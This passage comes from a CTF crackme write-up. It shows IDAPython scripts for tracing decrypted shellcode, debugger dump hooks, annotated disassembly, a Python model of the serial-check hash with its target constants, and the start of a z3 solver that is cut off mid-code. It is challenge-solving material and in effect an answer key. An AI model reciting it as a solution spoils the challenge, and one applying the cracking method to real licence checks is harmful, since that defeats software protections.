24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# -*- coding: utf-8 -*-
import os
import ida_segment
import ida_bytes
import ida_ua
import idc
import idaapi

RECORD_SIZE = 0x20
VALID_PREFIX = 0x10
OUT_ASMCODE = r"E:\CTF\temp\asmcode.txt"

def to_pat_hex(bs: bytes) -> str: return bs.hex()

def main():
seg = ida_segment.getseg(0)
start, end = seg.start_ea, seg.end_ea
nrec = (end - start) // RECORD_SIZE
os.makedirs(os.path.dirname(OUT_ASMCODE), exist_ok=True)
out_lines = []
for i in range(nrec):
ea = start + i * RECORD_SIZE
ida_bytes.del_items(ea, ida_bytes.DELIT_SIMPLE, VALID_PREFIX)
insn1 = ida_ua.insn_t()
ilen1 = ida_ua.decode_insn(insn1, ea)
if ilen1 <= 0 or ilen1 > VALID_PREFIX: continue
bytes1 = ida_bytes.get_bytes(ea, ilen1)
if not bytes1: continue
out_lines.append(to_pat_hex(bytes1))
ea2 = ea + ilen1
if ea2 < ea + VALID_PREFIX:
insn2 = ida_ua.insn_t()
ilen2 = ida_ua.decode_insn(insn2, ea2)
if ilen2 > 0 and insn2.itype == idaapi.NN_call:
bytes2 = ida_bytes.get_bytes(ea2, ilen2)
if bytes2: out_lines.append(to_pat_hex(bytes2))
with open(OUT_ASMCODE, "w", encoding="utf-8") as f:
for s in out_lines: f.write(s + "\n")
print(f"[ok] wrote {len(out_lines)} lines -> {OUT_ASMCODE}")

if __name__ == "__main__":
main()

And then patch decrypted .pc to another Crackme.exe, get the disasm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
import os
import idc
import ida_bytes
import ida_segment
import ida_ua

ASMCODE_PATH = r"E:\CTF\temp\asmcode.txt"
OUT_TRACEASM = r"E:\CTF\temp\traceasm.txt"
PC_START_EA = 0x0040A000
WINDOW = 0x20

def hex_to_bytes(hx: str) -> bytes:
hx = hx.strip().lower()
if len(hx) % 2 != 0: raise ValueError(f"bad hex len: {hx}")
return bytes.fromhex(hx)

def bytes_to_patstr(bs: bytes) -> str: return " ".join(f"{b:02x}" for b in bs)

def get_pc_seg():
for name in (".pc", "pc"):
seg = ida_segment.get_segm_by_name(name)
if seg: return seg
return ida_segment.getseg(PC_START_EA)

def read_bytes(ea: int, n: int) -> bytes | None:
bs = ida_bytes.get_bytes(ea, n)
return bs if bs else None

pc_blob = 0
seg_start = 0
seg_end = 0

def find_in_range(start_ea: int, end_ea: int, needle: bytes) -> int:
global pc_blob, seg_start, seg_end
if not pc_blob:
return idc.BADADDR
s = max(start_ea, seg_start) - seg_start
e = min(end_ea, seg_end) - seg_start
if s < 0: s = 0
if e < s: return idc.BADADDR
idx = pc_blob.find(needle, s, e)
return (seg_start + idx) if idx != -1 else idc.BADADDR


def decode_len_and_mnem(ea: int, fallback_len: int):
idc.create_insn(ea)
insn = ida_ua.insn_t()
ilen = ida_ua.decode_insn(insn, ea)
if ilen <= 0: ilen = fallback_len
mnem = (idc.print_insn_mnem(ea) or "").lower()
return ilen, mnem

def op_target(ea: int) -> int:
try:
v = idc.get_operand_value(ea, 0)
return v if isinstance(v, int) else 0
except Exception:
return 0

def is_ret(mnem: str) -> bool: return mnem.startswith("ret")
def is_call(mnem: str) -> bool: return mnem == "call" or mnem == "callf"
def is_jmp(mnem: str) -> bool: return mnem == "jmp" or mnem == "jmpf"

def is_cond_jump_or_loop(mnem: str) -> bool:
if mnem in ("jcxz", "jecxz", "loop", "loope", "loopz", "loopne", "loopnz"): return True
return mnem.startswith("j") and not is_jmp(mnem)

def main():
global pc_blob, seg_start, seg_end
seg = get_pc_seg()
seg_start, seg_end = seg.start_ea, seg.end_ea
if not (seg_start <= PC_START_EA < seg_end): raise RuntimeError(f"PC_START_EA=0x{PC_START_EA:08X} not in 0x{seg_start:08X}-0x{seg_end:08X}")
pc_blob = ida_bytes.get_bytes(seg_start, seg_end - seg_start) or b""
codes_hex = []
with open(ASMCODE_PATH, "r", encoding="utf-8") as f:
for line in f:
s = line.strip()
if s: codes_hex.append(s)
os.makedirs(os.path.dirname(OUT_TRACEASM), exist_ok=True)
cursor = PC_START_EA
alt_cursor = None
call_stack = []
last_occ = {}
restart_guard = 0
with open(OUT_TRACEASM, "w", encoding="utf-8") as out:
i = 0
while i < len(codes_hex):
# print(i)
if restart_guard > 20000:
out.write("[fatal] too many restarts, stop.\n")
break
hx = codes_hex[i]
bs = hex_to_bytes(hx)
pat = bytes_to_patstr(bs)
blen = len(bs)
def try_match_from(pos: int) -> int:
here = read_bytes(pos, blen)
if here == bs: return pos
win_end = min(pos + WINDOW, seg_end)
return find_in_range(pos, win_end, bs)
ea = try_match_from(cursor)
if ea == idc.BADADDR and alt_cursor is not None:
ea2 = try_match_from(alt_cursor)
if ea2 != idc.BADADDR:
cursor = alt_cursor
alt_cursor = None
ea = ea2
if ea == idc.BADADDR:
if hx in last_occ: ea = last_occ[hx]
else:
ea3 = find_in_range(PC_START_EA, seg_end, bs)
if ea3 == idc.BADADDR:
cursor = PC_START_EA
alt_cursor = None
call_stack.clear()
last_occ.clear()
i = 0
restart_guard += 1
continue
ea = ea3
last_occ[hx] = ea
ida_bytes.del_items(ea, ida_bytes.DELIT_SIMPLE, 16)
idc.create_insn(ea)
dis = idc.generate_disasm_line(ea, 0) or ""
ilen, mnem = decode_len_and_mnem(ea, blen)
out.write(f"{i:06d}\t0x{ea:08X}\t{hx}\t{dis}\n")
next_fall = ea + ilen
alt_cursor = None
if is_call(mnem):
ret_addr = ea + ilen
tgt = op_target(ea)
call_stack.append(ret_addr)
if seg_start <= tgt < seg_end: cursor = tgt
else: cursor = ret_addr
elif is_ret(mnem):
if call_stack: cursor = call_stack.pop()
else: cursor = next_fall
elif is_jmp(mnem):
tgt = op_target(ea)
if seg_start <= tgt < seg_end: cursor = tgt
else: cursor = next_fall
elif is_cond_jump_or_loop(mnem):
tgt = op_target(ea)
cursor = next_fall
if seg_start <= tgt < seg_end: alt_cursor = tgt
else: cursor = next_fall
i += 1
print(f"[ok] wrote -> {OUT_TRACEASM}")
print(f"[info] pc_seg=0x{seg_start:08X}-0x{seg_end:08X}, start=0x{PC_START_EA:08X}")

if __name__ == "__main__":
main()

Through the assembly code, it was found that shellcode uses [ebp-0x10] to [ebp-0x4] as temporary registers, add to dump:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
def _dump_once(tid=None):
global g_fp, g_last_dump16, g_dump_count
if MAX_DUMPS and g_dump_count >= MAX_DUMPS: return
try: p = ida_dbg.get_reg_val("EBX")
except Exception as e:
print(f"[dump] get_reg_val(EBX) failed: {e}")
return
if p is None or p < 0x10000: return
data = dbg_read_mem(p, READ_SIZE)
if data is None:
print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{p:08X}")
return
if len(data) < READ_SIZE: data += b"\x00" * (READ_SIZE - len(data))
if DEDUP_CONSECUTIVE and g_last_dump16 == data: return
out = data + (b"\x00" * PAD_SIZE)
try:
g_fp.write(out)
g_fp.flush()
g_last_dump16 = data
g_dump_count += 1
ebp_arr = [0]*4
for i in range(4): ebp_arr[i] = read_dword_from_target(0x19F354+4*i)
print(f"[dump] #{g_dump_count} hit 0x{BREAK_EA:08X} | EBX=0x{p:08X} | [EBP-0x10~EBP-0x4] = "+" ".join(f"0x{v:08X}" for v in ebp_arr))
except Exception as e:
print(f"[dump] file write error: {e}")

From the trace output, the 4 dwords are: sum_diff, block_state, byte_processed and state_tag. The block_res is initialized with 0xCAFEBABE, and updated every byte. When the number of processed byte reaches 4 (19 for the last one), the block_state will xor with the index of 5 dwords which load by 40A000, and the result will or to sum_diff. Hardware breakpoint shows that the input will be load at movzx eax, byte ptr [ecx+eax], and the run amount of this instruction is just 19. And in the loop, [ebp+8] is the block_state, [ebp-4] is the input byte. Analyze the first part:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
0x0040A0AA      movzx eax, byte ptr [ecx+eax] ; inp[0]
0x0040A0AE push eax
0x0040A0AF push dword ptr [ebp-0Ch]
0x0040A0B2 mov ecx, [ebp-14h]
0x0040A0B5 call 0x40A1CE
0x0040A1CE push ebp
0x0040A1CF mov ebp, esp
0x0040A1D1 sub esp, 14h
0x0040A1D4 push ebx
0x0040A1D5 push esi
0x0040A1D6 push edi
0x0040A1D7 mov [ebp-14h], ecx
0x0040A1DA movzx eax, byte ptr [ebp+0Ch]
0x0040A1DE mov [ebp-4], eax
; jmp 0x0040A1E9
0x0040A1E9 mov eax, [ebp+8]
0x0040A1EC and eax, 1 ; and block_state, 1
; if block_state & 1 == 0 {
0x0040A1F5 cmp dword ptr [ebp-4], 40h ; num|let
; if inp < 0x40 (num) {{
0x0040A1FB xor eax, eax
0x0040A1FD cmp eax, 6Ch ; 'l'
0x0040A203 mov eax, [ebp-4]
0x0040A206 and eax, 2 ; and inp, 2
; if inp & 2 == 0 {{{
0x0040A231 mov eax, [ebp-4]
0x0040A234 shl eax, 4
0x0040A237 mov ecx, [ebp+8]
0x0040A23A sub ecx, eax
0x0040A23C mov [ebp+8], ecx
0x0040A23F cmp dword ptr [ebp-4], 30h ; '0'
; if inp == 0x30 {{{{
0x0040A245 xor eax, eax
0x0040A247 cmp eax, 79h ; 'y'
0x0040A24D mov eax, [ebp+8]
0x0040A250 or eax, 0F0F0F0F0h
0x0040A255 mov [ebp+8], eax
; }}}} else (inp != 0x30) {{{{ (do nothing) }}}}.
; }}} else (inp & 2 == 2) {{{
0x0040A20B xor eax, eax
0x0040A20D cmp eax, 0
0x0040A213 mov eax, [ebp+8]
0x0040A216 xor eax, 55AA55AAh
0x0040A21B mov [ebp+8], eax
0x0040A21E mov eax, [ebp+8]
0x0040A221 add eax, [ebp-4]
0x0040A224 mov [ebp+8], eax
; }}}.
; }} else (inp >= 0x40) (not num) {{
0x0040A203 mov eax, [ebp-4]
0x0040A25D xor edx, edx
0x0040A25F push 2
0x0040A261 pop ecx
0x0040A262 div ecx
0x0040A264 test edx, edx
; if inp % 2 == 0 {{{
0x0040A26F mov eax, [ebp+8]
0x0040A272 shl eax, 3
0x0040A275 mov ecx, [ebp+8]
0x0040A278 shr ecx, 1Dh
0x0040A27B or eax, ecx
0x0040A27D mov [ebp+8], eax
0x0040A280 mov eax, [ebp+8]
0x0040A283 add eax, 12345678h
; }}} else (inp % 2 == 1) {{{
0x0040A295 mov eax, [ebp+8]
0x0040A298 shr eax, 5
0x0040A29B mov ecx, [ebp+8]
0x0040A29E shl ecx, 1Bh
0x0040A2A1 or eax, ecx
0x0040A2A3 mov [ebp+8], eax
0x0040A2A6 mov eax, [ebp+8]
0x0040A2A9 xor eax, 87654321h
; }}}.
0x0040A288 mov [ebp+8], eax
; }}.
; } else (state & 1 == 1) {
0x0040A2BE mov eax, [ebp+8]
0x0040A2C1 xor eax, [ebp-4]
0x0040A2C4 cmp eax, 80000000h
; if state & 0x80000000 == 0x80000000 {{
0x0040A2D3 mov eax, [ebp+8]
0x0040A2D6 sub eax, 21524111h
0x0040A2DB mov [ebp+8], eax
0x0040A2DE cmp dword ptr [ebp-4], 60h ; '`'
; if inp < 0x60 {{{ do nothing }}} else (inp >= 0x60) {{{
0x0040A2EB imul eax, [ebp-4], 21h ; '!'
0x0040A2EF xor eax, [ebp+8]
0x0040A2F2 mov [ebp+8], eax
; }}}.
; }} else (state ^ inp & 0x80000000 == 0) {{
0x0040A107 xor eax, eax
0x0040A2F9 cmp eax, 9Dh
0x0040A301 cmp dword ptr [ebp-4], 61h ; 'a'
; if inp < 'a' {{{
0x0040A318 cmp dword ptr [ebp-4], 41h ; 'A'
; if inp >= 'A' {{{{
0x0040A31E cmp dword ptr [ebp-4], 5Ah ; 'Z'
; if inp <= 'Z' {{{{{
0x0040A324 mov eax, 1
0x0040A329 inc eax
0x0040A32D mov eax, [ebp+8]
0x0040A330 add eax, [ebp-4]
0x0040A333 mov [ebp+8], eax
0x0040A336 mov eax, [ebp+8]
0x0040A339 and eax, 100h
; if state & 0x100 == 0 {{{{{{ (do nothing) }}}}}} else (state & 0x100 == 0x100) {{{{{{
0x0040A340 xor eax, eax
0x0040A342 cmp eax, 0
0x0040A348 mov eax, [ebp+8]
0x0040A34B xor eax, 13371337h
0x0040A350 mov [ebp+8], eax
; }}}}}}.
; }}}}} else (inp > 'Z') {{{{{
0x0040A107 xor eax, eax
0x0040A357 cmp eax, 0AEh
0x0040A35F imul eax, [ebp+8], 9
0x0040A363 mov [ebp+8], eax
; }}}}}.
; }}}} else (inp < 'A') {{{{
; the same as above inp > 'Z'.
; }}}}.
; }}} else (inp >= 'a') {{{
0x0040A307 cmp dword ptr [ebp-4], 7Ah ; 'z'
; if inp <= 'z' {{{{
0x0040A30D mov eax, [ebp+8]
0x0040A310 sub eax, [ebp-4]
0x0040A313 mov [ebp+8], eax
; }}}} else (inp > 'z') {{{{
; the same as above inp > 'Z'.
; }}}}.
; }}}.
; }}.
; }.

This part is a extremely complex function, as:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def rol32(num, shift): return ((num << shift) | (num >> (0x20-shift))) & 0xFFFFFFFF
def ror32(num, shift): return ((num >> shift) | (num << (0x20-shift))) & 0xFFFFFFFF

def switch_case(inp, state):
if state & 1 == 0:
if inp < 0x40:
if inp & 2 == 0:
state = (state - (inp << 4)) & 0xFFFFFFFF
if inp == 0x30: state |= 0xF0F0F0F0
else: state = ((state ^ 0x55AA55AA) + inp) & 0xFFFFFFFF
else:
if inp % 2 == 0: state = (rol32(state, 3) + 0x12345678) & 0xFFFFFFFF
else: state = (ror32(state, 5) ^ 0x87654321)
else:
if (state ^ inp) & 0x80000000 == 0:
if ord("a") <= inp <= ord("z"): state = (state - inp) & 0xFFFFFFFF
elif ord("A") <= inp <= ord("Z"):
state = (state + inp) & 0xFFFFFFFF
if state & 0x100 == 0x100: state ^= 0x13371337
else: state = (state * 9) & 0xFFFFFFFF
else:
state = (state - 0x21524111) & 0xFFFFFFFF
if 0x60 <= inp: state = state ^ ((inp * 0x21) & 0xFFFFFFFF)
return state

And in the second part, the [ebp-0Ch] is the round index, and the [ebp-10h] is the round amount:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
0x0040A0F5      mov eax, 1
0x0040A0FA inc eax
0x0040A231 mov eax, [ebp-4]
0x0040A25D xor edx, edx
0x0040A374 push 5
0x0040A376 pop ecx
0x0040A377 div ecx ; inp % 5
0x0040A379 inc edx
0x0040A37A inc edx ; inp % 5 + 2, this is the amount of round
0x0040A37B mov [ebp-10h], edx
0x0040A37E mov dword ptr [ebp-0Ch], 0
0x0040A387 mov eax, [ebp-0Ch]
0x0040A391 cmp eax, [ebp-10h]
; begin (inp % 5) + 2 rounds:
0x0040A39E mov eax, [ebp+8]
0x0040A3A1 and eax, 80000000h
; if state & 0x80000000 == 0x80000000 {
0x0040A3AF mov eax, [ebp+8]
0x0040A3B2 shl eax, 1
0x0040A3B4 xor eax, 4C11DB7h
; } else (state & 0x80000000 == 0) {
0x0040A3C6 mov eax, [ebp+8]
0x0040A3C9 shl eax, 1
;}.
0x0040A3B9 mov [ebp+8], eax
0x0040A3CE xor eax, eax
0x0040A3D0 cmp eax, 0C4h
0x0040A3D8 mov eax, [ebp-0Ch]
0x0040A3DB and eax, 80000001h
0x0040A3E7 test eax, eax
; if eax == 0 {
0x0040A3EB xor eax, eax
0x0040A3ED cmp eax, 0
0x0040A3F3 mov eax, [ebp+8]
0x0040A3F6 xor eax, [ebp-4]
; } else (eax == 1) {
0x0040A405 imul eax, [ebp-0Ch], 0Ah
0x0040A409 add eax, [ebp+8]
; }.
0x0040A40C mov [ebp+8], eax
0x0040A3D8 mov eax, [ebp-0Ch]
0x0040A3E6 inc eax ; round tag ++
0x0040A5AA mov [ebp-0Ch], eax
0x0040A5AD mov eax, [ebp-0Ch]
0x0040A391 cmp eax, [ebp-10h] ; cmp with round amount
; loop end

This is:

1
2
3
4
5
6
7
8
9
def round_func(inp, state):
round_num = inp % 5 + 2
for i in range(round_num):
tmp = state & 0x80000000
state = (state << 1) & 0xFFFFFFFF
if not tmp == 0: state ^= 0x4C11DB7
if i & 1 == 0: state ^= inp
else: state = (state + (i * 10)) & 0xFFFFFFFF
return state

Part 3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
0x0040A39E      mov eax, [ebp+8]
0x0040A5A4 mov [ebp-8], eax
0x0040A5A7 mov eax, [ebp-8]
0x0040A41D shr eax, 10h
0x0040A420 xor eax, [ebp-8]
0x0040A423 mov [ebp-8], eax
0x0040A426 mov eax, [ebp-8]
0x0040A429 shr eax, 8
0x0040A42C xor eax, [ebp-8]
0x0040A42F mov [ebp-8], eax
0x0040A43A mov eax, [ebp-8]
0x0040A43D and eax, 0Fh
0x0040A440 cmp eax, 7
; if eax >= 7 {
0x0040A445 mov eax, 1
0x0040A44A inc eax
0x0040A44E mov eax, [ebp+8]
0x0040A451 not eax
0x0040A453 mov [ebp+8], eax
; } else (eax < 7) {
0x0040A458 cmp dword ptr [ebp+8], 0
; }.
; dword ptr [ebp+8] != 0:
0x0040A46F mov eax, [ebp+8]
0x0040A472 pop edi
0x0040A473 pop esi
0x0040A474 pop ebx
0x0040A475 leave
0x0040A476 retn 8
0x0040A5AA mov [ebp-0Ch], eax; write to [ebp-0Ch]

In the end of this part, the value of [ebp-0Ch] is updated. This part is as:

1
2
3
4
5
def tail_func(inp, state):
tmp = (state >> 0x10) ^ state
tmp1 = (tmp >> 8) ^ tmp
if tmp1 & 0xF > 7: state = (~state) & 0xFFFFFFFF
return state

Therefore, we can search for the middle vars during the function, and the result is: the addr of ebp during the function is at 0x19F328. [ebp-8] is0x19F320, as the tail_func tmp1; [ebp+8] is0x19F330, as the state in func. Add them to the mix hook:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def _dump_once(tid=None):
global g_fp, g_last_dump16, g_dump_count
if MAX_DUMPS and g_dump_count >= MAX_DUMPS: return
try: p = ida_dbg.get_reg_val("EBX")
except Exception as e:
print(f"[dump] get_reg_val(EBX) failed: {e}")
return
if p is None or p < 0x10000: return
data = dbg_read_mem(p, READ_SIZE)
if data is None:
print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{p:08X}")
return
if len(data) < READ_SIZE: data += b"\x00" * (READ_SIZE - len(data))
if DEDUP_CONSECUTIVE and g_last_dump16 == data: return
out = data + (b"\x00" * PAD_SIZE)
try:
g_fp.write(out)
g_fp.flush()
g_last_dump16 = data
g_dump_count += 1
ebp_arr = [0]*4
for i in range(4): ebp_arr[i] = read_dword_from_target(0x19F354+4*i)
state = read_dword_from_target(0x19F330)
tail_num = read_dword_from_target(0x19F320) & 0xF
print(f"[dump] #{g_dump_count} hit 0x{BREAK_EA:08X} | EBX=0x{p:08X} | [EBP-0x10~EBP-0x4] = "+" ".join(f"0x{v:08X}" for v in ebp_arr)+f" | state = 0x{state:08X} | tail_num = {tail_num}")
except Exception as e:
print(f"[dump] file write error: {e}")

The total function of these 3 part is:

1
2
3
4
5
def byte_func(inp, state):
state = switch_case(inp, state)
state = round_func(inp, state)
state = tail_func(inp, state)
return state

After this part and before the next char is loaded:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
0x0040A426      mov eax, [ebp-8]
0x0040A435 inc eax ; add the amount of char processed
0x0040A42F mov [ebp-8], eax
0x0040A0CB mov eax, [ebp-8]
0x0040A0CE and eax, 80000003h
0x0040A0DA test eax, eax ; and with 3, the case of per 4 char an outer round
0x0040A0EF cmp dword ptr [ebp-8], 13h ; cmp with end encryption
0x0040A107 xor eax, eax
0x0040A109 cmp eax, 0
0x0040A10F mov dword ptr [ebp-4], 1
0x0040A06D mov ecx, eax
0x0040A06F call 0x40A4B5
0x0040A4B5 push ebp
0x0040A4B6 mov ebp, esp
0x0040A4B8 sub esp, 38h
0x0040A4BB mov [ebp-4], ecx
0x0040A4BE mov eax, [ebp-4]
0x0040A4C1 mov eax, [eax+24h]
0x0040A4C4 mov [ebp-18h], eax
0x0040A4C7 mov eax, [ebp-4]
0x0040A4CA mov eax, [eax+28h]
0x0040A4CD mov [ebp-14h], eax
0x0040A4D0 mov dword ptr [ebp-8], 0
0x0040A4D7 mov ecx, [ebp-4]
0x0040A4DA call 0x40A479
0x0040A479 push ebp
0x0040A47A mov ebp, esp
0x0040A47C sub esp, 10h
0x0040A47F mov [ebp-8], ecx
0x0040A482 mov byte ptr [ebp-1], 90h
0x0040A486 mov eax, [ebp-8]
0x0040A489 mov eax, [eax+24h]
0x0040A48C mov ecx, [ebp-8]
0x0040A48F mov ecx, [ecx+28h]
0x0040A492 lea eax, [eax+ecx-1]
0x0040A496 mov [ebp-10h], eax
0x0040A499 mov eax, [ebp-10h]
0x0040A49C mov [ebp-0Ch], eax
0x0040A49F mov eax, [ebp-0Ch]
0x0040A4A2 mov al, [eax]
0x0040A4A4 mov [ebp-2], al
0x0040A4A7 mov eax, [ebp-0Ch]
0x0040A4AA mov cl, [ebp-1]
0x0040A4AD mov [eax], cl
0x0040A4AF movzx eax, byte ptr [ebp-2]
0x0040A4B3 leave
0x0040A4B4 retn
0x0040A4DF mov [ebp-38h], al
0x0040A4E2 call sub_40113E ; hash funcs
0x0040A4E7 mov [ebp-10h], eax
0x0040A4EA mov eax, [ebp-4]
0x0040A4ED mov eax, [eax]
0x0040A4EF mov [ebp-0Ch], eax
0x0040A4F2 lea eax, [ebp-8]
0x0040A4F5 push eax
0x0040A4F6 push 0
0x0040A4F8 push 0
0x0040A4FA push 800Ch
0x0040A4FF push dword ptr [ebp-0Ch]
0x0040A502 mov ecx, [ebp-10h]
0x0040A505 call sub_401022
0x0040A50A test eax, eax
0x0040A513 mov [ebp-20h], eax
0x0040A516 mov eax, [ebp-8]
0x0040A519 mov [ebp-1Ch], eax
0x0040A51C push 0
0x0040A51E push dword ptr [ebp-14h]
0x0040A521 push dword ptr [ebp-18h]
0x0040A524 push dword ptr [ebp-1Ch]
0x0040A527 mov ecx, [ebp-20h]
0x0040A52A call sub_40108E
0x0040A52F test eax, eax
0x0040A533 mov dword ptr [ebp-24h], 20h ; ' '
0x0040A53A call sub_40113E
0x0040A53F mov [ebp-2Ch], eax
0x0040A542 mov eax, [ebp-8]
0x0040A545 mov [ebp-28h], eax
0x0040A548 push 0
0x0040A54A lea eax, [ebp-24h]
0x0040A54D push eax
0x0040A54E mov eax, [ebp-4]
0x0040A551 add eax, 4
0x0040A554 push eax
0x0040A555 push 2
0x0040A557 push dword ptr [ebp-28h]
0x0040A55A mov ecx, [ebp-2Ch]
0x0040A55D call sub_40107C
0x0040A562 nop
0x0040A563 call sub_40113E
0x0040A568 mov [ebp-34h], eax
0x0040A56B mov eax, [ebp-8]
0x0040A56E mov [ebp-30h], eax
0x0040A571 push dword ptr [ebp-30h]
0x0040A574 mov ecx, [ebp-34h]
0x0040A577 call sub_401058
0x0040A57C nop
0x0040A57D push dword ptr [ebp-38h]
0x0040A580 mov ecx, [ebp-4]
0x0040A583 call 0x40A58B
0x0040A58B push ebp
0x0040A58C mov ebp, esp
0x0040A58E sub esp, 0Ch
0x0040A591 mov [ebp-4], ecx
0x0040A594 mov eax, [ebp-4]
0x0040A597 mov eax, [eax+24h]
0x0040A59A mov ecx, [ebp-4]
0x0040A59D mov ecx, [ecx+28h]
0x0040A5A0 lea eax, [eax+ecx-1]
0x0040A5A4 mov [ebp-8], eax
0x0040A5A7 mov eax, [ebp-8]
0x0040A5AA mov [ebp-0Ch], eax
0x0040A5AD mov eax, [ebp-0Ch]
0x0040A5B0 mov cl, [ebp+8]
0x0040A5B3 mov [eax], cl
0x0040A5B5 leave
0x0040A5B6 retn 4
0x0040A588 nop
0x0040A589 leave
0x0040A58A retn
0x0040A107 xor eax, eax
0x0040A109 cmp eax, 0
0x0040A07C cmp dword ptr [ebp-4], 0
0x0040A096 cmp dword ptr [ebp-4], 1
0x0040A0A4 mov eax, [ebp-8]
0x0040A0A7 mov ecx, [ebp+8]

These codes are mainly used for hash verification and their existence can be ignored. And for every 4 byte after calculating:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
0x0040A124      cdq
0x0040A125 and edx, 3 ; index & 3
0x0040A128 add eax, edx
0x0040A12A sar eax, 2
0x0040A12D dec eax ; index//4 - 1
0x0040A12E mov [ebp-18h], eax
0x0040A131 mov eax, [ebp-18h]
0x0040A134 mov ecx, [ebp-14h]
0x0040A137 mov eax, [ecx+eax*4] ; take the 5 dwords 0x40A000 loaded
0x0040A13A mov [ebp-1Ch], eax
0x0040A13D mov eax, 1
0x0040A142 inc eax
0x0040A146 mov eax, [ebp-0Ch]
0x0040A149 xor eax, [ebp-1Ch] ; xor with cipher[index]
0x0040A14C mov ecx, [ebp-10h]
0x0040A14F or ecx, eax
0x0040A151 mov [ebp-10h], ecx ; accumulate bit difference
0x0040A154 xor eax, eax
0x0040A156 cmp eax, 48h ; 'H'
0x0040A15C imul eax, [ebp-8], 112233h
0x0040A163 sub eax, 35014542h ; change state to i*0x112233-0x35014542, infact 0xCAFEBABE is -0x35014542
0x0040A168 mov [ebp-0Ch], eax
0x0040A16B mov dword ptr [ebp-4], 1
0x0040A06D mov ecx, eax
...

Therefore the encrypt process is:

1
2
3
4
5
6
7
8
9
10
sn = bytearray(b"1234567890123456789")
cip = []
for l in range(0, len(sn), 4):
inp = sn[l:l+4]
state = (l * 0x112233 - 0x35014542) & 0xFFFFFFFF
for i in range(len(inp)): state = byte_func(inp[i], state)
cip.append(state)

enc = [0x865DBB47, 0x0A6EB190, 0x20476C33, 0x1C8A7693, 0x59FEBDFB]
assert cip == enc

For each dword:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from z3 import *

BV32 = lambda x: BitVecVal(x & 0xFFFFFFFF, 32)
BV8 = lambda x: BitVecVal(x & 0xFF, 8)
def zext8_to_32(b8): return ZeroExt(24, b8)
def rol32(x, sh): return RotateLeft(x, sh)
def ror32(x, sh): return RotateRight(x, sh)
def ULT32(a, b): return ULT(a, b)
def ULE32(a, b): return ULE(a, b)
def UGT32(a, b): return UGT(a, b)
def UGE32(a, b): return UGE(a, b)
def ULT8(a, b): return ULT(a, b)
def ULE8(a, b): return ULE(a, b)
def UGT8(a, b): return UGT(a, b)
def UGE8(a, b): return UGE(a, b)

def switch_case(inp8, state32):
inp32 = zext8_to_32(inp8)
c_state_lsb0 = (state32 & BV32(1)) == BV32(0)
c_inp_lt_40 = ULT8(inp8, BV8(0x40))
c_inp_bit1_0 = ((inp8 & BV8(2)) == BV8(0))
s1 = (state32 - (inp32 << 4)) & BV32(0xFFFFFFFF)
s1 = If(inp8 == BV8(0x30), s1 | BV32(0xF0F0F0F0), s1)
s2 = ((state32 ^ BV32(0x55AA55AA)) + inp32) & BV32(0xFFFFFFFF)
c_inp_even = ((inp8 & BV8(1)) == BV8(0))
s3 = (rol32(state32, 3) + BV32(0x12345678)) & BV32(0xFFFFFFFF)
s4 = (ror32(state32, 5) ^ BV32(0x87654321)) & BV32(0xFFFFFFFF)
branch_state0 = If(c_inp_lt_40, If(c_inp_bit1_0, s1, s2), If(c_inp_even, s3, s4))
c_topbit_same = (((state32 ^ inp32) & BV32(0x80000000)) == BV32(0))
s5 = (state32 - inp32) & BV32(0xFFFFFFFF)
s6 = (state32 + inp32) & BV32(0xFFFFFFFF)
s6 = If((s6 & BV32(0x100)) == BV32(0x100), s6 ^ BV32(0x13371337), s6)
s7 = (state32 * BV32(9)) & BV32(0xFFFFFFFF)
